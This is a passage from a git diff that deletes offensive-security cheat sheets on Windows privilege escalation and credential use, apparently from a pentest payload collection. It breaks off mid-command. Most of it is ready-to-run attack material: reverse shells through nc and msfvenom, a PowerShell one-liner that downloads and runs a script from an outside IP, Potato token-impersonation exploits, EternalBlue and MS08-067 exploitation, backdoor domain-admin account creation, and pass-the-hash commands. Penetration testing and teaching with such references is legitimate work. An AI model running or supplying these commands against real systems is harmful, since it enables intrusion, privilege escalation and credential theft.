$fullprinterName -ErrorAction SilentlyContinue -Add-Printer -ConnectionName $fullprinterName -``` - -### PrinterNightmare - -```ps1 -git clone https://github.com/Flangvik/DeployPrinterNightmare -PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell -[<3] @Flangvik - TrustedSec -[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll -[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll -[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll -[+] Adding printer driver => Generic / Text Only! -[+] Adding printer => EasySystemShell! -[+] Setting 64-bit Registry key -[+] Setting 32-bit Registry key -[+] Setting '*' Registry key -``` - -```ps1 -PS C:\target> $serverName = 'printer-installed-host' -PS C:\target> $printerName = 'EasySystemShell' -PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) -PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue -PS C:\target> Add-Printer -ConnectionName $fullprinterName -``` - -### Bring Your Own Vulnerability - -Concealed Position : https://github.com/jacob-baines/concealed_position - -* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE -* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE -* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE -* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE - -```powershell -cp_server.exe -e ACIDDAMAGE -# Get-Printer -# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing" -cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE -cp_client.exe -l -e ACIDDAMAGE -``` - -## EoP - Runas - -Use the `cmdkey` to list the stored credentials on the machine. - -```powershell -cmdkey /list -Currently stored credentials: - Target: Domain:interactive=WORKGROUP\Administrator - Type: Domain Password - User: WORKGROUP\Administrator -``` - -Then you can use `runas` with the `/savecred` options in order to use the saved credentials. -The following example is calling a remote binary via an SMB share. -```powershell -runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" -runas /savecred /user:Administrator "cmd.exe /k whoami" -``` - -Using `runas` with a provided set of credential. - -```powershell -C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" -``` - -```powershell -$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force -$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) -$computer = "" -[System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) -``` - -## EoP - Abusing Shadow Copies - -If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. - -```powershell -# List shadow copies using vssadmin (Needs Admnistrator Access) -vssadmin list shadows - -# List shadow copies using diskshadow -diskshadow list shadows all - -# Make a symlink to the shadow copy and access it -mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ -``` - -## EoP - From local administrator to NT SYSTEM - -```powershell -PsExec.exe -i -s cmd.exe -``` - -## EoP - Living Off The Land Binaries and Scripts - -Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/ - -> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. - -A LOLBin/Lib/Script must: - -* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. -Have extra "unexpected" functionality. It is not interesting to document intended use cases. -Exceptions are application whitelisting bypasses -* Have functionality that would be useful to an APT or red team - -```powershell -wmic.exe process call create calc -regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll -Microsoft.Workflow.Compiler.exe tests.xml results.xml -``` - -## EoP - Impersonation Privileges - -Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. - -| Privilege | Impact | Tool | Execution path | Remarks | -| --- | --- | --- | --- | --- | -|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | -|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP

- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.

- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | -|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || -|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | -|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | -|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | -|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | -|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || - -### Restore A Service Account's Privileges - -> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. - -```powershell -# https://github.com/itm4n/FullPowers - -c:\TOOLS>FullPowers -[+] Started dummy thread with id 9976 -[+] Successfully created scheduled task. -[+] Got new token! Privilege count: 7 -[+] CreateProcessAsUser() OK -Microsoft Windows [Version 10.0.19041.84] -(c) 2019 Microsoft Corporation. All rights reserved. - -C:\WINDOWS\system32>whoami /priv -PRIVILEGES INFORMATION ----------------------- -Privilege Name Description State -============================= ========================================= ======= -SeAssignPrimaryTokenPrivilege Replace a process level token Enabled -SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled -SeAuditPrivilege Generate security audits Enabled -SeChangeNotifyPrivilege Bypass traverse checking Enabled -SeImpersonatePrivilege Impersonate a client after authentication Enabled -SeCreateGlobalPrivilege Create global objects Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled - -c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z -``` - -### Meterpreter getsystem and alternatives - -```powershell -meterpreter> getsystem -Tokenvator.exe getsystem cmd.exe -incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe -psexec -s -i cmd.exe -python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc -``` - -### RottenPotato (Token Impersonation) - -* Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) -* Exploit using Metasploit with `incognito mode` loaded. - ```c - getuid - getprivs - use incognito - list\_tokens -u - cd c:\temp\ - execute -Hc -f ./rot.exe - impersonate\_token "NT AUTHORITY\SYSTEM" - ``` - -```powershell -Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" -Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" -Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" -``` - - -### Juicy Potato (Abusing the golden privileges) - -> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato** -> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato** - -* Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases) - -1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) - - ```powershell - whoami /priv - ``` - -2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object - - * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) - * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise) - * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise) - * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro) - * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) - * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter) - * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) - -3. Execute JuicyPotato to run a privileged command. - - ```powershell - JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} - JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} - JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" - Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 - ...... - [+] authresult 0 - {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM - [+] CreateProcessWithTokenW OK - ``` - -### Rogue Potato (Fake OXID Resolver) - -* Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) - -```powershell -# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port -socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 - -# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. -# Use this if you have fw restrictions. -RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" - -# RoguePotato all in one with RogueOxidResolver running locally on port 9999 -RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 - -#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename -RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode -``` - -### EFSPotato (MS-EFSR EfsRpcOpenFileRaw) - -* Binary available at https://github.com/zcgonvh/EfsPotato - -```powershell -# .NET 4.x -csc EfsPotato.cs -csc /platform:x86 EfsPotato.cs - -# .NET 2.0/3.5 -C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs -C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs -``` - -### JuicyPotatoNG - -* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) - -```powershell -JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt -``` - - -## EoP - Privileged File Write - -### DiagHub - -:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs. - -The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. -This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory. - -#### Exploit - -1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32` -2. Build https://github.com/xct/diaghub -3. `diaghub.exe c:\\ProgramData\\ payload.dll` - -The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe` - -Alternative tools: -* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag -* https://github.com/decoder-it/diaghub_exploit - - -### UsoDLLLoader - -:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. - -> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo) - -If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**. - -#### Exploit - -1. Build https://github.com/itm4n/UsoDllLoader - * Select Release config and x64 architecure. - * Build solution. - * DLL .\x64\Release\WindowsCoreDeviceInfo.dll - * Loader .\x64\Release\UsoDllLoader.exe. -2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\` -3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337. - - -### WerTrigger - -> Exploit Privileged File Writes bugs with Windows Problem Reporting - -1. Clone https://github.com/sailay1996/WerTrigger -2. Copy `phoneinfo.dll` to `C:\Windows\System32\` -3. Place `Report.wer` file and `WerTrigger.exe` in a same directory. -4. Then, run `WerTrigger.exe`. -5. Enjoy a shell as **NT AUTHORITY\SYSTEM** - -### WerMgr - -> Exploit Privileged Directory Creation Bugs with Windows Error Reporting - -1. Clone https://github.com/binderlabs/DirCreate2System -2. Create directory `C:\Windows\System32\wermgr.exe.local\` -3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` -4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. -5. Enjoy a shell as **NT AUTHORITY\SYSTEM** - - -## EoP - Common Vulnerabilities and Exposure - -### MS08-067 (NetAPI) - -Check the vulnerability with the following nmap script. - -```c -nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 -``` - -Metasploit modules to exploit `MS08-067 NetAPI`. - -```powershell -exploit/windows/smb/ms08_067_netapi -``` - -If you can't use Metasploit and only want a reverse shell. - -```powershell -https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py -msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows - -Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445 -Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) -Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal -Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English -Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX) -Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX) -Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX) -python ms08-067.py 10.0.0.1 6 445 -``` - - -### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - -'KiTrap0D' User Mode to Ring Escalation (MS10-015) - -```powershell -https://www.exploit-db.com/exploits/11199 - -Metasploit : exploit/windows/local/ms10_015_kitrap0d -``` - -### MS11-080 (afd.sys) - Microsoft Windows XP/2003 - -```powershell -Python: https://www.exploit-db.com/exploits/18176 -Metasploit: exploit/windows/local/ms11_080_afdjoinleaf -``` - -### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 - -```powershell -printf("[#] usage: ms15-051 command \n"); -printf("[#] eg: ms15-051 \"whoami /all\" \n"); - -# x32 -https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe - -# x64 -https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe - -https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 -use exploit/windows/local/ms15_051_client_copy_image -``` - - -### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - -Check if the patch is installed : `wmic qfe list | findstr "3139914"` - -```powershell -Powershell: -https://www.exploit-db.com/exploits/39719/ -https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 - -Binary exe : https://github.com/Meatballs1/ms16-032 - -Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc -``` - -### MS17-010 (Eternal Blue) - -Check the vulnerability with the following nmap script or crackmapexec: `crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010`. - -```c -nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 -``` - -Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`. - -```powershell -auxiliary/admin/smb/ms17_010_command MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution -auxiliary/scanner/smb/smb_ms17_010 MS17-010 SMB RCE Detection -exploit/windows/smb/ms17_010_eternalblue MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption -exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ -exploit/windows/smb/ms17_010_psexec MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution -``` - -If you can't use Metasploit and only want a reverse shell. - -```powershell -git clone https://github.com/helviojunior/MS17-010 - -# generate a simple reverse shell to use -msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe -python2 send_and_execute.py 10.0.0.1 revshell.exe -``` - -### CVE-2019-1388 - -Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html - -Requirement: -- Windows 7 -- Windows 10 LTSC 10240 - -Failing on : -- LTSC 2019 -- 1709 -- 1803 - -Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege - - -## References - -* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) -* [Privilege Escalation Windows - Philip Linghammar](https://web.archive.org/web/20191231011305/https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) -* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) -* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) -* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) -* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) -* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) -* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) -* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) -* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md) -* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/) -* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/) -* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/) -* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/) -* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/) -* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/) -* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/) -* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/) -* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) -* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) -* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) -* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) -* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) -* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) -* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) -* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) -* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://web.archive.org/web/20191105182846/https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) -* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/2019/03/06/abusing-diaghub/) -* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html) -* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/) -* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1) -* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) -* [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) -* [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) -* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) -* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) -* [IN THE POTATO FAMILY, I WANT THEM ALL - @BlWasp_ ](https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all) -* [Potatoes - Windows Privilege Escalation - Jorge Lajara - November 22, 2020](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md deleted file mode 100644 index e711fa9..0000000 --- a/Methodology and Resources/Windows - Using credentials.md +++ /dev/null @@ -1,394 +0,0 @@ -# Windows - Using credentials - -## Summary - -* [Get credentials](#get-credentials) - * [Create your credential](#create-your-credential) - * [Guest Credential](#guest-credential) - * [Retail Credential](#retail-credential) - * [Sandbox Credential](#sandbox-credential) -* [Crackmapexec](#crackmapexec) -* [Impacket](#impacket) - * [PSExec](#psexec) - * [WMIExec](#wmiexec) - * [SMBExec](#smbexec) - -* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) -* [Powershell Remoting Protocol](#powershell-remoting-protocol) - * [Powershell Credentials](#powershell-credentials) - * [Powershell PSSESSION](#powershell-pssession) - * [Powershell Secure String](#powershell-secure-strings) -* [SSH Protocol](#ssh-protocol) -* [WinRM Protocol](#winrm-protocol) -* [WMI Protocol](#wmi-protocol) - -* [Other methods](#other-methods) - * [PsExec - Sysinternal](#psexec-sysinternal) - * [Mount a remote share](#mount-a-remote-share) - * [Run as another user](#run-as-another-user) - -## Get credentials - -### Create your credential - -```powershell -net user hacker Hcker_12345678* /add /Y -net localgroup administrators hacker /add -net localgroup "Remote Desktop Users" hacker /add # RDP access -net localgroup "Backup Operators" hacker /add # Full access to files -net group "Domain Admins" hacker /add /domain - -# enable a domain user account -net user hacker /ACTIVE:YES /domain - -# prevent users from changing their password -net user username /Passwordchg:No - -# prevent the password to expire -net user hacker /Expires:Never - -# create a machine account (not shown in net users) -net user /add evilbob$ evilpassword - -# homoglyph Aԁmіnistratοr (different of Administrator) -Aԁmіnistratοr -``` - -Some info about your user - -```powershell -net user /dom -net user /domain -``` - -### Guest Credential - -By default every Windows machine comes with a Guest account, its default password is empty. - -```powershell -Username: Guest -Password: [EMPTY] -NT Hash: 31d6cfe0d16ae931b73c59d7e0c089c0 -``` - -### Retail Credential - -Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) - -when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin - -```powershell -Username: RetailAdmin -Password: trs10 -``` - -### Sandbox Credential - -WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) - -Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard - -```powershell -\\windowssandbox -Username: wdagutilityaccount -Password: pw123 -``` - -## Crackmapexec - -Using [Porchetta-Industries/CrackMapExec](https://github.com/Porchetta-Industries/CrackMapExec) - -* CrackMapExec supports many protocols - ```powershell - crackmapexec ldap 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec mssql 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec rdp 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - crackmapexec winrm 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" - ``` -* CrackMapExec works with password, NT hash and Kerberos authentication - ```powershell - crackmapexec smb 192.168.1.100 -u Administrator -p "Password123?" # Password - crackmapexec smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" # NT Hash - export KRB5CCNAME=/tmp/kerberos/admin.ccache; crackmapexec smb 192.168.1.100 -u admin --use-kcache # Kerberos - ``` - - -## Impacket - -From [fortra/impacket](https://github.com/fortra/impacket) (:warning: renamed to impacket-xxxxx in Kali) -:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`. -:warning: French characters might not be correctly displayed on your output, use `-codec ibm850` to fix this. -:warning: By default, Impacket's scripts are stored in the examples folder: `impacket/examples/psexec.py`. - -All Impacket's *exec scripts are not equal, they will target services hosted on multiples ports. -The following table summarize the port used by each scripts. - -| Method | Port Used | Admin Required | -|-------------|---------------------------------------|----------------| -| psexec.py | tcp/445 | Yes | -| smbexec.py | tcp/445 | No | -| atexec.py | tcp/445 | No | -| dcomexec.py | tcp/135, tcp/445, tcp/49751 (DCOM) | No | -| wmiexec.py | tcp/135, tcp/445, tcp/50911 (Winmgmt) | Yes | - -* `psexec`: equivalent of Windows PSEXEC using RemComSvc binary. - ```ps1 - psexec.py DOMAIN/username:password@10.10.10.10 - ``` -* `smbexec`: a similar approach to PSEXEC w/o using RemComSvc - ```ps1 - smbexec.py DOMAIN/username:password@10.10.10.10 - ``` -* `atexec`: executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. - ```ps1 - atexec.py DOMAIN/username:password@10.10.10.10 - ``` -* `dcomexec`: a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints - ```ps1 - dcomexec.py DOMAIN/username:password@10.10.10.10 - ``` -* `wmiexec`: a semi-interactive shell, used through Windows Management Instrumentation. First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911. - ```ps1 - wmiexec.py DOMAIN/username:password@10.10.10.10 - wmiexec.py 